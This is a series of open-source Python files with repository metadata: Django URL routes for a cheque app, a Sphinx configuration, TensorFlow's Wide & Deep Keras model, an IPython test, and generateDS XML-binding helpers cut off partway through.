url(r'^cheque/emitir/add$', CreateChequeEmitido.as_view(), name='create_cheque_emissao'),
url(r'^cheque/emitir/edit/(?P<pk>\d+)$', UpdateChequeEmitido.as_view(), name='update_cheque_emissao'),
url(r'^cheque/emitir/delete/(?P<pk>\d+)$', DeleteChequeEmitido.as_view(), name='delete_cheque_emissao'),
url(r'^cheque/receber/$', ListChequeRecebido.as_view(), name='list_cheque_recebimento'),
url(r'^cheque/receber/add$', CreateChequeRecebido.as_view(), name='create_cheque_recebimento'),
url(r'^cheque/receber/edit/(?P<pk>\d+)$', UpdateChequeRecebido.as_view(), name='update_cheque_recebimento'),
url(r'^cheque/receber/delete/(?P<pk>\d+)$', DeleteChequeRecebido.as_view(), name='delete_cheque_recebimento'),
url(r'^baixa/$', BaixaChequesView.as_view(), name='baixa'),
url(r'^repasse/$', RepasseChequesView.as_view(), name='repasse'),
url(r'^ajax/get_situacao_cliente/$', get_situacao_cliente, name='get_situacao_cliente'),
url(r'^ajax/efetuar_baixa/$', efetuar_baixa, name='efetuar_baixa'),
url(r'^ajax/efetuar_repasse/$', efetuar_repasse, name='efetuar_repasse'),
]
|
gabrielnaoto/man_check_control
|
check/core/urls.py
|
Python
|
mit
| 2,444
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# pylint: disable=redefined-builtin
#
# complexity documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# Get the project root dir, which is the parent dir of this
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ["sphinx.ext.autodoc", "sphinx.ext.viewcode"]
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix of source filenames.
source_suffix = ".rst"
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = "index"
# General information about the project.
project = u"debot"
copyright = u"2014, Harry Liang"
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = "0.1.0"
# The full version, including alpha/beta/rc tags.
release = "0.1.0"
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ["_build"]
# The reST default role (used for this markup: `text`) to use for all documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "nature"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = "debotdoc"
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
("index", "debot.tex", u"debot Documentation", u"Harry Liang", "manual"),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [("index", "debot", u"debot Documentation", [u"Harry Liang"], 1)]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
"index",
"debot",
u"debot Documentation",
u"Harry Liang",
"debot",
"One line description of project.",
"Miscellaneous",
),
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False
|
tryagainconcepts/debot
|
docs/conf.py
|
Python
|
mit
| 8,437
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Built-in WideNDeep model classes."""
from tensorflow.python.eager import backprop
from tensorflow.python.keras import activations
from tensorflow.python.keras import backend
from tensorflow.python.keras import layers as layer_module
from tensorflow.python.keras.engine import base_layer
from tensorflow.python.keras.engine import data_adapter
from tensorflow.python.keras.engine import training as keras_training
from tensorflow.python.keras.utils import generic_utils
from tensorflow.python.util import nest
from tensorflow.python.util.tf_export import keras_export
@keras_export('keras.experimental.WideDeepModel')
class WideDeepModel(keras_training.Model):
r"""Wide & Deep Model for regression and classification problems.
This model jointly train a linear and a dnn model.
Example:
```python
linear_model = LinearModel()
dnn_model = keras.Sequential([keras.layers.Dense(units=64),
keras.layers.Dense(units=1)])
combined_model = WideDeepModel(linear_model, dnn_model)
combined_model.compile(optimizer=['sgd', 'adam'], 'mse', ['mse'])
# define dnn_inputs and linear_inputs as separate numpy arrays or
# a single numpy array if dnn_inputs is same as linear_inputs.
combined_model.fit([linear_inputs, dnn_inputs], y, epochs)
# or define a single `tf.data.Dataset` that contains a single tensor or
# separate tensors for dnn_inputs and linear_inputs.
dataset = tf.data.Dataset.from_tensors(([linear_inputs, dnn_inputs], y))
combined_model.fit(dataset, epochs)
```
Both linear and dnn model can be pre-compiled and trained separately
before jointly training:
Example:
```python
linear_model = LinearModel()
linear_model.compile('adagrad', 'mse')
linear_model.fit(linear_inputs, y, epochs)
dnn_model = keras.Sequential([keras.layers.Dense(units=1)])
dnn_model.compile('rmsprop', 'mse')
dnn_model.fit(dnn_inputs, y, epochs)
combined_model = WideDeepModel(linear_model, dnn_model)
combined_model.compile(optimizer=['sgd', 'adam'], 'mse', ['mse'])
combined_model.fit([linear_inputs, dnn_inputs], y, epochs)
```
"""
def __init__(self, linear_model, dnn_model, activation=None, **kwargs):
"""Create a Wide & Deep Model.
Args:
linear_model: a premade LinearModel, its output must match the output of
the dnn model.
dnn_model: a `tf.keras.Model`, its output must match the output of the
linear model.
activation: Activation function. Set it to None to maintain a linear
activation.
**kwargs: The keyword arguments that are passed on to BaseLayer.__init__.
Allowed keyword arguments include `name`.
"""
super(WideDeepModel, self).__init__(**kwargs)
base_layer.keras_premade_model_gauge.get_cell('WideDeep').set(True)
self.linear_model = linear_model
self.dnn_model = dnn_model
self.activation = activations.get(activation)
def call(self, inputs, training=None):
if not isinstance(inputs, (tuple, list)) or len(inputs) != 2:
linear_inputs = dnn_inputs = inputs
else:
linear_inputs, dnn_inputs = inputs
linear_output = self.linear_model(linear_inputs)
# pylint: disable=protected-access
if self.dnn_model._expects_training_arg:
if training is None:
training = backend.learning_phase()
dnn_output = self.dnn_model(dnn_inputs, training=training)
else:
dnn_output = self.dnn_model(dnn_inputs)
output = nest.map_structure(lambda x, y: (x + y), linear_output, dnn_output)
if self.activation:
return nest.map_structure(self.activation, output)
return output
# This does not support gradient scaling and LossScaleOptimizer.
def train_step(self, data):
x, y, sample_weight = data_adapter.unpack_x_y_sample_weight(data)
x, y, sample_weight = data_adapter.expand_1d((x, y, sample_weight))
with backprop.GradientTape() as tape:
y_pred = self(x, training=True)
loss = self.compiled_loss(
y, y_pred, sample_weight, regularization_losses=self.losses)
self.compiled_metrics.update_state(y, y_pred, sample_weight)
if isinstance(self.optimizer, (list, tuple)):
linear_vars = self.linear_model.trainable_variables
dnn_vars = self.dnn_model.trainable_variables
linear_grads, dnn_grads = tape.gradient(loss, (linear_vars, dnn_vars))
linear_optimizer = self.optimizer[0]
dnn_optimizer = self.optimizer[1]
linear_optimizer.apply_gradients(zip(linear_grads, linear_vars))
dnn_optimizer.apply_gradients(zip(dnn_grads, dnn_vars))
else:
trainable_variables = self.trainable_variables
grads = tape.gradient(loss, trainable_variables)
self.optimizer.apply_gradients(zip(grads, trainable_variables))
return {m.name: m.result() for m in self.metrics}
def _make_train_function(self):
# Only needed for graph mode and model_to_estimator.
has_recompiled = self._recompile_weights_loss_and_weighted_metrics()
self._check_trainable_weights_consistency()
# If we have re-compiled the loss/weighted metric sub-graphs then create
# train function even if one exists already. This is because
# `_feed_sample_weights` list has been updated on re-compile.
if getattr(self, 'train_function', None) is None or has_recompiled:
# Restore the compiled trainable state.
current_trainable_state = self._get_trainable_state()
self._set_trainable_state(self._compiled_trainable_state)
inputs = (
self._feed_inputs + self._feed_targets + self._feed_sample_weights)
if not isinstance(backend.symbolic_learning_phase(), int):
inputs += [backend.symbolic_learning_phase()]
if isinstance(self.optimizer, (list, tuple)):
linear_optimizer = self.optimizer[0]
dnn_optimizer = self.optimizer[1]
else:
linear_optimizer = self.optimizer
dnn_optimizer = self.optimizer
with backend.get_graph().as_default():
with backend.name_scope('training'):
# Training updates
updates = []
linear_updates = linear_optimizer.get_updates(
params=self.linear_model.trainable_weights, # pylint: disable=protected-access
loss=self.total_loss)
updates += linear_updates
dnn_updates = dnn_optimizer.get_updates(
params=self.dnn_model.trainable_weights, # pylint: disable=protected-access
loss=self.total_loss)
updates += dnn_updates
# Unconditional updates
updates += self.get_updates_for(None)
# Conditional updates relevant to this model
updates += self.get_updates_for(self.inputs)
metrics = self._get_training_eval_metrics()
metrics_tensors = [
m._call_result for m in metrics if hasattr(m, '_call_result') # pylint: disable=protected-access
]
with backend.name_scope('training'):
# Gets loss and metrics. Updates weights at each call.
fn = backend.function(
inputs, [self.total_loss] + metrics_tensors,
updates=updates,
name='train_function',
**self._function_kwargs)
setattr(self, 'train_function', fn)
# Restore the current trainable state
self._set_trainable_state(current_trainable_state)
def get_config(self):
linear_config = generic_utils.serialize_keras_object(self.linear_model)
dnn_config = generic_utils.serialize_keras_object(self.dnn_model)
config = {
'linear_model': linear_config,
'dnn_model': dnn_config,
'activation': activations.serialize(self.activation),
}
base_config = base_layer.Layer.get_config(self)
return dict(list(base_config.items()) + list(config.items()))
@classmethod
def from_config(cls, config, custom_objects=None):
linear_config = config.pop('linear_model')
linear_model = layer_module.deserialize(linear_config, custom_objects)
dnn_config = config.pop('dnn_model')
dnn_model = layer_module.deserialize(dnn_config, custom_objects)
activation = activations.deserialize(
config.pop('activation', None), custom_objects=custom_objects)
return cls(
linear_model=linear_model,
dnn_model=dnn_model,
activation=activation,
**config)
|
sarvex/tensorflow
|
tensorflow/python/keras/premade/wide_deep.py
|
Python
|
apache-2.0
| 9,006
|
#-----------------------------------------------------------------------------
# Copyright (C) 2013 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
from .. import localinterfaces
def test_load_ips():
# Override the machinery that skips it if it was called before
localinterfaces._load_ips.called = False
# Just check this doesn't error
localinterfaces._load_ips(suppress_exceptions=False)
|
mattvonrocketstein/smash
|
smashlib/ipy3x/utils/tests/test_localinterfaces.py
|
Python
|
mit
| 607
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated Tue Oct 28 21:10:10 2014 by generateDS.py version 2.12e.
#
# Command line options:
# ('-o', 'schema/vchs/ondemand/sc/sc/instanceType.py')
#
# Command line arguments:
# schema/vchs/ondemand/sc/sc/instance.xsd
#
# Command line:
# ./generateDS-2.12e/generateDS.py -o "schema/vchs/ondemand/sc/sc/instanceType.py" schema/vchs/ondemand/sc/sc/instance.xsd
#
# Current working directory (os.getcwd()):
# vchs-api-cli-cli
#
import sys
import getopt
import re as re_
import base64
import datetime as datetime_
etree_ = None
Verbose_import_ = False
(
XMLParser_import_none, XMLParser_import_lxml,
XMLParser_import_elementtree
) = range(3)
XMLParser_import_library = None
try:
# lxml
from lxml import etree as etree_
XMLParser_import_library = XMLParser_import_lxml
if Verbose_import_:
print("running with lxml.etree")
except ImportError:
try:
# cElementTree from Python 2.5+
import xml.etree.cElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with cElementTree on Python 2.5+")
except ImportError:
try:
# ElementTree from Python 2.5+
import xml.etree.ElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with ElementTree on Python 2.5+")
except ImportError:
try:
# normal cElementTree install
import cElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with cElementTree")
except ImportError:
try:
# normal ElementTree install
import elementtree.ElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with ElementTree")
except ImportError:
raise ImportError(
"Failed to import ElementTree from any known place")
def parsexml_(*args, **kwargs):
if (XMLParser_import_library == XMLParser_import_lxml and
'parser' not in kwargs):
# Use the lxml ElementTree compatible parser so that, e.g.,
# we ignore comments.
kwargs['parser'] = etree_.ETCompatXMLParser()
doc = etree_.parse(*args, **kwargs)
return doc
#
# User methods
#
# Calls to the methods in these classes are generated by generateDS.py.
# You can replace these methods by re-implementing the following class
# in a module named generatedssuper.py.
try:
from generatedssuper import GeneratedsSuper
except ImportError as exp:
class GeneratedsSuper(object):
tzoff_pattern = re_.compile(r'(\+|-)((0\d|1[0-3]):[0-5]\d|14:00)$')
class _FixedOffsetTZ(datetime_.tzinfo):
def __init__(self, offset, name):
self.__offset = datetime_.timedelta(minutes=offset)
self.__name = name
def utcoffset(self, dt):
return self.__offset
def tzname(self, dt):
return self.__name
def dst(self, dt):
return None
def gds_format_string(self, input_data, input_name=''):
return input_data
def gds_validate_string(self, input_data, node, input_name=''):
if not input_data:
return ''
else:
return input_data
def gds_format_base64(self, input_data, input_name=''):
return base64.b64encode(input_data)
def gds_validate_base64(self, input_data, node, input_name=''):
return input_data
def gds_format_integer(self, input_data, input_name=''):
return '%d' % input_data
def gds_validate_integer(self, input_data, node, input_name=''):
return input_data
def gds_format_integer_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_integer_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of integers')
return input_data
def gds_format_float(self, input_data, input_name=''):
return ('%.15f' % input_data).rstrip('0')
def gds_validate_float(self, input_data, node, input_name=''):
return input_data
def gds_format_float_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_float_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of floats')
return input_data
def gds_format_double(self, input_data, input_name=''):
return '%e' % input_data
def gds_validate_double(self, input_data, node, input_name=''):
return input_data
def gds_format_double_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_double_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of doubles')
return input_data
def gds_format_boolean(self, input_data, input_name=''):
return ('%s' % input_data).lower()
def gds_validate_boolean(self, input_data, node, input_name=''):
return input_data
def gds_format_boolean_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_boolean_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
if value not in ('true', '1', 'false', '0', ):
raise_parse_error(
node,
'Requires sequence of booleans '
'("true", "1", "false", "0")')
return input_data
def gds_validate_datetime(self, input_data, node, input_name=''):
return input_data
def gds_format_datetime(self, input_data, input_name=''):
if input_data.microsecond == 0:
_svalue = '%04d-%02d-%02dT%02d:%02d:%02d' % (
input_data.year,
input_data.month,
input_data.day,
input_data.hour,
input_data.minute,
input_data.second,
)
else:
_svalue = '%04d-%02d-%02dT%02d:%02d:%02d.%s' % (
input_data.year,
input_data.month,
input_data.day,
input_data.hour,
input_data.minute,
input_data.second,
('%f' % (float(input_data.microsecond) / 1000000))[2:],
)
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
return _svalue
@classmethod
def gds_parse_datetime(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
time_parts = input_data.split('.')
if len(time_parts) > 1:
micro_seconds = int(float('0.' + time_parts[1]) * 1000000)
input_data = '%s.%s' % (time_parts[0], micro_seconds, )
dt = datetime_.datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S.%f')
else:
dt = datetime_.datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S')
dt = dt.replace(tzinfo=tz)
return dt
def gds_validate_date(self, input_data, node, input_name=''):
return input_data
def gds_format_date(self, input_data, input_name=''):
_svalue = '%04d-%02d-%02d' % (
input_data.year,
input_data.month,
input_data.day,
)
try:
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
except AttributeError:
pass
return _svalue
@classmethod
def gds_parse_date(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
dt = datetime_.datetime.strptime(input_data, '%Y-%m-%d')
dt = dt.replace(tzinfo=tz)
return dt.date()
def gds_validate_time(self, input_data, node, input_name=''):
return input_data
def gds_format_time(self, input_data, input_name=''):
if input_data.microsecond == 0:
_svalue = '%02d:%02d:%02d' % (
input_data.hour,
input_data.minute,
input_data.second,
)
else:
_svalue = '%02d:%02d:%02d.%s' % (
input_data.hour,
input_data.minute,
input_data.second,
('%f' % (float(input_data.microsecond) / 1000000))[2:],
)
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
return _svalue
@classmethod
def gds_parse_time(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
if len(input_data.split('.')) > 1:
dt = datetime_.datetime.strptime(input_data, '%H:%M:%S.%f')
else:
dt = datetime_.datetime.strptime(input_data, '%H:%M:%S')
dt = dt.replace(tzinfo=tz)
return dt.time()
def gds_str_lower(self, instring):
return instring.lower()
def get_path_(self, node):
path_list = []
self.get_path_list_(node, path_list)
path_list.reverse()
path = '/'.join(path_list)
return path
Tag_strip_pattern_ = re_.compile(r'\{.*\}')
def get_path_list_(self, node, path_list):
if node is None:
return
tag = GeneratedsSuper.Tag_strip_pattern_.sub('', node.tag)
if tag:
path_list.append(tag)
self.get_path_list_(node.getparent(), path_list)
def get_class_obj_(self, node, default_class=None):
class_obj1 = default_class
if 'xsi' in node.nsmap:
classname = node.get('{%s}type' % node.nsmap['xsi'])
if classname is not None:
names = classname.split(':')
if len(names) == 2:
classname = names[1]
class_obj2 = globals().get(classname)
if class_obj2 is not None:
class_obj1 = class_obj2
return class_obj1
def gds_build_any(self, node, type_name=None):
return None
@classmethod
def gds_reverse_node_mapping(cls, mapping):
return dict(((v, k) for k, v in mapping.iteritems()))
#
# If you have installed IPython you can uncomment and use the following.
# IPython is available from http://ipython.scipy.org/.
#
## from IPython.Shell import IPShellEmbed
## args = ''
## ipshell = IPShellEmbed(args,
## banner = 'Dropping into IPython',
## exit_msg = 'Leaving Interpreter, back to program.')
# Then use the following line where and when you want to drop into the
# IPython shell:
# ipshell('<some message> -- Entering ipshell.\nHit Ctrl-D to exit')
#
# Globals
#
ExternalEncoding = 'ascii'
Tag_pattern_ = re_.compile(r'({.*})?(.*)')
String_cleanup_pat_ = re_.compile(r"[\n\r\s]+")
Namespace_extract_pat_ = re_.compile(r'{(.*)}(.*)')
#
# Support/utility functions.
#
def showIndent(outfile, level, pretty_print=True):
if pretty_print:
for idx in range(level):
outfile.write(' ')
def quote_xml(inStr):
if not inStr:
return ''
s1 = (isinstance(inStr, basestring) and inStr or
'%s' % inStr)
s1 = s1.replace('&', '&')
s1 = s1.replace('<', '<')
s1 = s1.replace('>', '>')
return s1
def quote_attrib(inStr):
s1 = (isinstance(inStr, basestring) and inStr or
'%s' % inStr)
s1 = s1.replace('&', '&')
s1 = s1.replace('<', '<')
s1 = s1.replace('>', '>')
if '"' in s1:
if "'" in s1:
s1 = '"%s"' % s1.replace('"', """)
else:
s1 = "'%s'" % s1
else:
s1 = '"%s"' % s1
return s1
def quote_python(inStr):
s1 = inStr
if s1.find("'") == -1:
if s1.find('\n') == -1:
return "'%s'" % s1
else:
return "'''%s'''" % s1
else:
if s1.find('"') != -1:
s1 = s1.replace('"', '\\"')
if s1.find('\n') == -1:
return '"%s"' % s1
else:
return '"""%s"""' % s1
def get_all_text_(node):
if node.text is not None:
text = node.text
else:
text = ''
for child in node:
if child.tail is not None:
text += child.tail
return text
def find_attr_value_(attr_name, node):
attrs = node.attrib
attr_parts = attr_name.split(':')
value = None
if len(attr_parts) == 1:
value = attrs.get(attr_name)
elif len(attr_parts) == 2:
prefix, name = attr_parts
namespace = node.nsmap.get(prefix)
if namespace is not None:
value = attrs.get('{%s}%s' % (namespace, name, ))
return value
class GDSParseError(Exception):
pass
def raise_parse_error(node, msg):
if XMLParser_import_library == XMLParser_import_lxml:
msg = '%s (element %s/line %d)' % (
msg, node.tag, node.sourceline, )
else:
msg = '%s (element %s)' % (msg, node.tag, )
raise GDSParseError(msg)
class MixedContainer:
# Constants for category:
CategoryNone = 0
CategoryText = 1
CategorySimple = 2
CategoryComplex = 3
# Constants for content_type:
TypeNone = 0
TypeText = 1
TypeString = 2
TypeInteger = 3
TypeFloat = 4
TypeDecimal = 5
TypeDouble = 6
TypeBoolean = 7
TypeBase64 = 8
def __init__(self, category, content_type, name, value):
self.category = category
self.content_type = content_type
self.name = name
self.value = value
def getCategory(self):
return self.category
def getContenttype(self, content_type):
return self.content_type
def getValue(self):
return self.value
def getName(self):
return self.name
def export(self, outfile, level, name, namespace, pretty_print=True):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
outfile.write(self.value)
elif self.category == MixedContainer.CategorySimple:
self.exportSimple(outfile, level, name)
else: # category == MixedContainer.CategoryComplex
self.value.export(outfile, level, namespace, name, pretty_print)
def exportSimple(self, outfile, level, name):
if self.content_type == MixedContainer.TypeString:
outfile.write('<%s>%s</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeInteger or \
self.content_type == MixedContainer.TypeBoolean:
outfile.write('<%s>%d</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeFloat or \
self.content_type == MixedContainer.TypeDecimal:
outfile.write('<%s>%f</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeDouble:
outfile.write('<%s>%g</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeBase64:
outfile.write('<%s>%s</%s>' % (
self.name, base64.b64encode(self.value), self.name))
def to_etree(self, element):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
if len(element) > 0:
if element[-1].tail is None:
element[-1].tail = self.value
else:
element[-1].tail += self.value
else:
if element.text is None:
element.text = self.value
else:
element.text += self.value
elif self.category == MixedContainer.CategorySimple:
subelement = etree_.SubElement(element, '%s' % self.name)
subelement.text = self.to_etree_simple()
else: # category == MixedContainer.CategoryComplex
self.value.to_etree(element)
def to_etree_simple(self):
if self.content_type == MixedContainer.TypeString:
text = self.value
elif (self.content_type == MixedContainer.TypeInteger or
self.content_type == MixedContainer.TypeBoolean):
text = '%d' % self.value
elif (self.content_type == MixedContainer.TypeFloat or
self.content_type == MixedContainer.TypeDecimal):
text = '%f' % self.value
elif self.content_type == MixedContainer.TypeDouble:
text = '%g' % self.value
elif self.content_type == MixedContainer.TypeBase64:
text = '%s' % base64.b64encode(self.value)
return text
def exportLiteral(self, outfile, level, name):
if self.category == MixedContainer.CategoryText:
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
self.category, self.content_type, self.name, self.value))
elif self.category == MixedContainer.CategorySimple:
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
self.category, self.content_type, self.name, self.value))
else: # category == MixedContainer.CategoryComplex
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s",\n' % (
self.category, self.content_type, self.name,))
self.value.exportLiteral(outfile, level + 1)
showIndent(outfile, level)
outfile.write(')\n')
class MemberSpec_(object):
def __init__(self, name='', data_type='', container=0):
self.name = name
self.data_type = data_type
self.container = container
def set_name(self, name): self.name = name
def get_name(self): return self.name
def set_data_type(self, data_type): self.data_type = data_type
